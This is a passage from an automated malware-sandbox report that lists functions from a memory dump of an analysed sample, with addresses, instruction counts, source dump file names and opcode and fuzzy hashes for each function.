                                  Function 00007FFD9B8BAA8C Relevance: .1, Instructions: 57COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: acb588bf8f2af778f612dc8b8d1b032332779a7edd70660e5327be5cf55bf938
                                  • Instruction ID: f4c46fd8306db20bf0f515f83e86178cdf10a33fb311fed609282d1418f66b13
                                  • Opcode Fuzzy Hash: acb588bf8f2af778f612dc8b8d1b032332779a7edd70660e5327be5cf55bf938
                                  • Instruction Fuzzy Hash: 9F018022B1DD2E0AD67CA66C64614B97391EB5836071041BAD05EC31DAED28A94246C5
                                  Function 00007FFD9B8B14E1 Relevance: .1, Instructions: 57COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fd5a8e5b81bf50da9803f9ae43256fad8a09aee15dd7b18b7588abec7b81c9ac
                                  • Instruction ID: 867992945baccd823691d2af4dc0ba880c4a37ac98d67eb44dc7406876778115
                                  • Opcode Fuzzy Hash: fd5a8e5b81bf50da9803f9ae43256fad8a09aee15dd7b18b7588abec7b81c9ac
                                  • Instruction Fuzzy Hash: CC01753170CA054FDB8CDF6CE49596577E1FBA9310714059FD44ACB2A6DA21ED81CB81
                                  Function 00007FFD9B8BA8D8 Relevance: .1, Instructions: 57COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: aad29f40505883a14276f5b34c448dc96fe801f9d3e29ad5e9082c919efd81d2
                                  • Instruction ID: 73783fc6f76e38c24e24b3b81efd565b270a0b54dda7dc679c97b078424d4e65
                                  • Opcode Fuzzy Hash: aad29f40505883a14276f5b34c448dc96fe801f9d3e29ad5e9082c919efd81d2
                                  • Instruction Fuzzy Hash: A001DE22B1DD2E0AD67CA76CA0604B9A3D1EF9C32075001BFD02EC32DBDD28B94306C5
                                  Function 00007FFD9B8BA8FB Relevance: .1, Instructions: 56COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 05e4694c251a6895464690f05f1f0e458d25e0307b3fa5c1b60d5f58e04e039e
                                  • Instruction ID: 191cc3f7644f00a90840119a831fce123b179cfdb1302e2aa41b4ac9f9be72cd
                                  • Opcode Fuzzy Hash: 05e4694c251a6895464690f05f1f0e458d25e0307b3fa5c1b60d5f58e04e039e
                                  • Instruction Fuzzy Hash: 8801DE32B1DD2E0AE67CA66CA4614B9A381EF8C32071101BAD02EC32DBDD28B94246C5
                                  Function 00007FFD9B8BAAF5 Relevance: .1, Instructions: 55COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dab637f069094e6c23a1f6a31752a412757d3684a33944b7d4d2311b1e793869
                                  • Instruction ID: 80f63686572f8b4b071dd0f6e33848b3c3507810db46fda856021f252a4b1c59
                                  • Opcode Fuzzy Hash: dab637f069094e6c23a1f6a31752a412757d3684a33944b7d4d2311b1e793869
                                  • Instruction Fuzzy Hash: 62018F22B1DD2E0AD67CAB6C74611A9A3C1EB8C720B5002BED05EC329BDD29A94206C5
                                  Function 00007FFD9B8BAB1D Relevance: .1, Instructions: 55COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 675f9adef0e9c8fa98f342746968ef06e3e3d05a78764b9c13974c85daba1728
                                  • Instruction ID: abd57865e869603020ee0dc983c6ac3f9b3f75f449de6d9018312765cd5d269d
                                  • Opcode Fuzzy Hash: 675f9adef0e9c8fa98f342746968ef06e3e3d05a78764b9c13974c85daba1728
                                  • Instruction Fuzzy Hash: FD018F22B1DD2E0AD67CA75C74611A9A3C1EB9C72075042BFD45EC329BDD28A94346C5
                                  Function 00007FFD9B8BA9CD Relevance: .1, Instructions: 55COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b0b8078247efa0ec3673490e47d10153d9188c6754d152a1f26482ef7dfd3ffa
                                  • Instruction ID: 6dd12205979c6be1094a5c400762cde6b03c0b7b2091d7be434c7fc97fed5342
                                  • Opcode Fuzzy Hash: b0b8078247efa0ec3673490e47d10153d9188c6754d152a1f26482ef7dfd3ffa
                                  • Instruction Fuzzy Hash: 3C018F22B1DD2E0AE67CAB6C74214B9B3C1EB9C76071141BFD05EC32DBED28A94206C5
                                  Function 00007FFD9B8BA9F8 Relevance: .1, Instructions: 54COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 736e9272efe7dc14b24d7ce930959f3c50ba9a12a2a2d8ad94dbfe369077528d
                                  • Instruction ID: 48108b24d338d29ebb7c28b24a34ea8a1b7b9c26ccea7f29556066e5d62825cb
                                  • Opcode Fuzzy Hash: 736e9272efe7dc14b24d7ce930959f3c50ba9a12a2a2d8ad94dbfe369077528d
                                  • Instruction Fuzzy Hash: 3301DF22B1DD2E0AD67CAB6C74610A9B3C1EF8C32074001BFD01EC329BED28AA4206C5
                                  Function 00007FFD9B8BAB45 Relevance: .1, Instructions: 51COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 034a7ddd538a554d9c3e21bd713131afa771b4156c3a657697088c8d711d017c
                                  • Instruction ID: d1e61e9e33a7dd6400f9db58eede4bf6d6e347dd6d75995bb23a2491500c7133
                                  • Opcode Fuzzy Hash: 034a7ddd538a554d9c3e21bd713131afa771b4156c3a657697088c8d711d017c
                                  • Instruction Fuzzy Hash: 3FF0D122B1DD2E0AD67CAB5CB4610A9B3D1EB8C76071001BFD45EC329BED29A94346C5
                                  Function 00007FFD9B8BAA46 Relevance: .1, Instructions: 51COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d2a52caa4ecef4738e2fe69b45c75adbd34a274e4d16ae9b8a4f52040cf9ae4e
                                  • Instruction ID: 0b0e4fcccdf98ce06ef30fe637aeb12f4861b893ccbab7ba5b756d55e2d52864
                                  • Opcode Fuzzy Hash: d2a52caa4ecef4738e2fe69b45c75adbd34a274e4d16ae9b8a4f52040cf9ae4e
                                  • Instruction Fuzzy Hash: 45F0D122B1DD2E0AD67CAB6C74611A9B3D1EB4C72071001BFD45EC329BED25B94246C5
                                  Function 00007FFD9B8DB1B0 Relevance: .1, Instructions: 51COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5608c72137a7e274b7a42fc685b73e050ae1c87573e192978f3f397378f055cc
                                  • Instruction ID: 418ebd1d2f742795291ca101a8ce3ed71d8b01ac3f3f4bedf07f2bde15369f68
                                  • Opcode Fuzzy Hash: 5608c72137a7e274b7a42fc685b73e050ae1c87573e192978f3f397378f055cc
                                  • Instruction Fuzzy Hash: FC11CA20A0DB9D49FB7093A89054771B7C09FD9304F094ABEC4CA426E2C99DBEC5C341
                                  Function 00007FFD9B8E4AC0 Relevance: .0, Instructions: 50COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b5ec2922b61d93b6b53064f6cece105f795d9f6108f084d95d271bbab7c7f065
                                  • Instruction ID: e892a784ad9c88ffe31afdbefae429dc2d092872b59a57cf5305f78daa652c87
                                  • Opcode Fuzzy Hash: b5ec2922b61d93b6b53064f6cece105f795d9f6108f084d95d271bbab7c7f065
                                  • Instruction Fuzzy Hash: C7F0F621B0991E0FEBBCE69DB4A42B836D1EF8C23274A00BEE40DC71A5E8458DC183C0
                                  Function 00007FFD9B8BA91E Relevance: .0, Instructions: 50COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eec2d3d348c12a9102bcd01dc31f6c17c620cfbbaa163cab4cbee3239b2579d1
                                  • Instruction ID: 58932c978b313993857287c98a534f93c71614a5ab884347f45eec2ea955d880
                                  • Opcode Fuzzy Hash: eec2d3d348c12a9102bcd01dc31f6c17c620cfbbaa163cab4cbee3239b2579d1
                                  • Instruction Fuzzy Hash: 65F0F222B0DE2E0BD67CAA5C7451069B3D1EB5832031100AED41EC329BDD24B94246C5
                                  Function 00007FFD9B8CE250 Relevance: .0, Instructions: 48COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9f0ff6cf005884c029f15f92d2697bf5dd8f6e4fe52d532f452c978da5efb308
                                  • Instruction ID: ddd438cc4da876e54a740dcf2992d264ea8cd1be26adfcf8437bfc040f8dadd4
                                  • Opcode Fuzzy Hash: 9f0ff6cf005884c029f15f92d2697bf5dd8f6e4fe52d532f452c978da5efb308
                                  • Instruction Fuzzy Hash: E5F06230715E0D4FD7A4FBAD949467272D2FBAC315714017DD00DC33A5DD25E8428740
                                  Function 00007FFD9B8BA987 Relevance: .0, Instructions: 48COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 35fba98ae79f1474914cb4a6a1d82d7b43e5ff7e6fc75b7f0a5459f09ee77adf
                                  • Instruction ID: 7b5c598403342c22ad9ecc6cae3bbd978e1d5740ae0a5b63504e84b3e85186f4
                                  • Opcode Fuzzy Hash: 35fba98ae79f1474914cb4a6a1d82d7b43e5ff7e6fc75b7f0a5459f09ee77adf
                                  • Instruction Fuzzy Hash: B5F0A432B1DD2E0AD67CAB9C74611A9B3D1EF8C72075041AFD06EC32DBDD29A94346C5
                                  Function 00007FFD9B8D6B58 Relevance: .0, Instructions: 47COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0813187b43dbfa25d441ec6bd83d430d1fa652108c58bf7659b75276f817ae03
                                  • Instruction ID: 8fe6ea934d4676825db7e78d11b14387d82ff15fe3181069f81c508a14b81453
                                  • Opcode Fuzzy Hash: 0813187b43dbfa25d441ec6bd83d430d1fa652108c58bf7659b75276f817ae03
                                  • Instruction Fuzzy Hash: D1F0F420B5A91D0AE9B9E7ED10752B811C2EFCD310B9A0377D40DC67E6CD29AE424381
                                  Function 00007FFD9B8BAA25 Relevance: .0, Instructions: 47COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d9475fd87c98eb6588fa056046c3e34019567988353e24535bb045e29373ce93
                                  • Instruction ID: af93a6016469bf6c1081b8248bc743aba76595735e1d41c0602d7f2f6d3a8e29
                                  • Opcode Fuzzy Hash: d9475fd87c98eb6588fa056046c3e34019567988353e24535bb045e29373ce93
                                  • Instruction Fuzzy Hash: 19F0A421B1DE6E0AD67DEB6874214A9B3D1EF4832075001FFD45EC32DBDD28B94646C6
                                  Function 00007FFD9B8B3C90 Relevance: .0, Instructions: 43COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8eb5fda517d985c7af3ff9743b6302b7000379c60a17dce0cc8fa0e37fb8d9e3
                                  • Instruction ID: 92fa47f5202f429b1e989df5059fb4fa504f91e648de0b1c32ad95e3f9cccf39
                                  • Opcode Fuzzy Hash: 8eb5fda517d985c7af3ff9743b6302b7000379c60a17dce0cc8fa0e37fb8d9e3
                                  • Instruction Fuzzy Hash: F4F0D170B19E1A8FDBB8E77490657B2B2E1FB58300F204479D01EC2194DE34E8468740
                                  Function 00007FFD9B8DB100 Relevance: .0, Instructions: 42COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7cb8af6cb147d60deeac64cd73bd444c98d013fde02de0b5191d1299d345a22c
                                  • Instruction ID: 7cc41bde1cd0c91b215b67ebc36b6f84f25a08aa60ae99b8da609a2eacd6eb6b
                                  • Opcode Fuzzy Hash: 7cb8af6cb147d60deeac64cd73bd444c98d013fde02de0b5191d1299d345a22c
                                  • Instruction Fuzzy Hash: FCF03C3071AA0E8FDEA8EB6DC4A0A2573D0EB9C34476547A9D40ECB2A1E916ED468700
                                  Function 00007FFD9B8B9E0A Relevance: .0, Instructions: 41COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8f42a0f551bfdb10eada8ace27fee32585d94b88a2e247e9661a23a6c03fc28f
                                  • Instruction ID: 0f93cda0390978bd604918c144d5fae3b21ddda3e8518966eba061c10c0a7f0f
                                  • Opcode Fuzzy Hash: 8f42a0f551bfdb10eada8ace27fee32585d94b88a2e247e9661a23a6c03fc28f
                                  • Instruction Fuzzy Hash: 4AF02E12B1AE1E0BE7E8A37C286823451C2EF8C610B8A04B6D00DC32EAFD19EC424681
                                  Function 00007FFD9B8B1D48 Relevance: .0, Instructions: 41COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f0237596ae64105a57a9d21673c8007bf9f9c5c1923421d8c34ae2f669e7de72
                                  • Instruction ID: 2f05618acd68696ed2f2635433402d5cb5d3d90041a13d07d8e6001fb7f1ad0d
                                  • Opcode Fuzzy Hash: f0237596ae64105a57a9d21673c8007bf9f9c5c1923421d8c34ae2f669e7de72
                                  • Instruction Fuzzy Hash: 94F0F623B2E94A4FE75DA238A4A18B5B390EF5635035506BBC00AC759AED25B5438781
                                  Function 00007FFD9B8B8199 Relevance: .0, Instructions: 40COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3d892af10f7cb36ddebbbf733d4e2e729c57ab52962f13ef63e03089ca6930dc
                                  • Instruction ID: 74fb406ed8f45edef391c356b05750923be26c775a39100cb96d1c63f9dcc1ac
                                  • Opcode Fuzzy Hash: 3d892af10f7cb36ddebbbf733d4e2e729c57ab52962f13ef63e03089ca6930dc
                                  • Instruction Fuzzy Hash: 0A016D7091DBCD4FDB4AEB688C681A97FB0FF59200B0504EBD468C71A2DA7555148741
                                  Function 00007FFD9B8B2AF5 Relevance: .0, Instructions: 37COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 57def6a6ec98a0cdeb30174df0977b6341712774bcb0a1b5dbcde91468b4db92
                                  • Instruction ID: 9b407acae1bdacece03426d7890b137da25474ff66d599741c5b64e8b215261e
                                  • Opcode Fuzzy Hash: 57def6a6ec98a0cdeb30174df0977b6341712774bcb0a1b5dbcde91468b4db92
                                  • Instruction Fuzzy Hash: EFE02241B2A82E13A378B6FD38A91FA06C5DFDC1287080037E01CC3293DC4858428381
                                  Function 00007FFD9B8DB120 Relevance: .0, Instructions: 37COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6e8d2cba1ea17d3b3f72fdcfb86c94ffc20c59254a5a59a3f1ff0a9d95ff7118
                                  • Instruction ID: abb9be7245a0be8193760fabdb0cf1c331402036e424ff0b12514c814e517edf
                                  • Opcode Fuzzy Hash: 6e8d2cba1ea17d3b3f72fdcfb86c94ffc20c59254a5a59a3f1ff0a9d95ff7118
                                  • Instruction Fuzzy Hash: 0FF0273160AA0D06EA74126A5C586B13BC8DF99252F11033BD449C21E1CD29E5818690
                                  Function 00007FFD9B8B22C8 Relevance: .0, Instructions: 36COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a460c540549db29cf0418eaf23a9fb6c59baa4ab773282a2b6d31e834e16180c
                                  • Instruction ID: 3c7c5675211c7d07164cbd610503183eefc616424290922115a4e933669e1ef2
                                  • Opcode Fuzzy Hash: a460c540549db29cf0418eaf23a9fb6c59baa4ab773282a2b6d31e834e16180c
                                  • Instruction Fuzzy Hash: 62F05901D0DE6A24F7F262BA20543B969C09B98320F4A22B7C888C45D1D80DFEC54381
                                  Function 00007FFD9B8B92E5 Relevance: .0, Instructions: 29COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4c9a328691be217f4e3c788a0c0e76a646ec89e9cc463f0234f7759b088bee49
                                  • Instruction ID: d7cf50aa6f53d233ff181b01dae2c71aaccdd9105a50c496319fc4c7c32f51a8
                                  • Opcode Fuzzy Hash: 4c9a328691be217f4e3c788a0c0e76a646ec89e9cc463f0234f7759b088bee49
                                  • Instruction Fuzzy Hash: 61E02222D0E7C90FD726973048620D93F60EF0A200F4601E3D0588B0D3E9189A098B82
                                  Function 00007FFD9B8CFEF0 Relevance: .0, Instructions: 28COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 070b9ff84fb48fd21820edf7ad03bdbaf89312067e973f523335461557b89cd7
                                  • Instruction ID: 9f1d297c7ccf48fe62e3ee4910fe2ce9a2f116b3e760ad96b236a3c0e3706110
                                  • Opcode Fuzzy Hash: 070b9ff84fb48fd21820edf7ad03bdbaf89312067e973f523335461557b89cd7
                                  • Instruction Fuzzy Hash: 1DE08C21715C1E0F8AA4E36CA85467522D5EBCC22074901A2A40CC32A8CE14CC4283C0
                                  Function 00007FFD9B8B08CD Relevance: .0, Instructions: 28COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 981c908e619c8df78a7b1653ac7ae8e01c7b324f3b4ccb88c362d30e6e700ffb
                                  • Instruction ID: 5dd3ba2e4595431abbbeab886ecc0476afa535c09bec47084bfe2fd5efe70ce7
                                  • Opcode Fuzzy Hash: 981c908e619c8df78a7b1653ac7ae8e01c7b324f3b4ccb88c362d30e6e700ffb
                                  • Instruction Fuzzy Hash: B8F049A18193C44EE392DB38845C3813FD0AF1A208F6900FEC488CF193E66B40878782
                                  Function 00007FFD9B8B32FB Relevance: .0, Instructions: 26COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1fdd06a22714875120530b6ed34a867c20e4d198fa7ab8a9a8a090be21147ff6
                                  • Instruction ID: 60c7ed03392ffa0d03089173883ed960c240cd50d085b7432123d3d0b19fb7f8
                                  • Opcode Fuzzy Hash: 1fdd06a22714875120530b6ed34a867c20e4d198fa7ab8a9a8a090be21147ff6
                                  • Instruction Fuzzy Hash: BCF05231E0829228D30B4B7498630F8BB30EE04710748017FC940961BBDB2D659AC7C0
                                  Function 00007FFD9B8C43E0 Relevance: .0, Instructions: 22COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 871fd4e4fd331de6ec4299202d739cb2b142bd84864187d241fc413b8f9a02ab
                                  • Instruction ID: 8616b2e67027d000008487f32b8d66cb6a4589b2ec033fc54f7cb12b57b52615
                                  • Opcode Fuzzy Hash: 871fd4e4fd331de6ec4299202d739cb2b142bd84864187d241fc413b8f9a02ab
                                  • Instruction Fuzzy Hash: CBD01220A29E1D4BDBB8BB7860556B5A1E0FB18310F410AAAD01AC3589EF68A98587C1
                                  Function 00007FFD9B8B3340 Relevance: .0, Instructions: 20COMMON
                                  Download Yara Rule
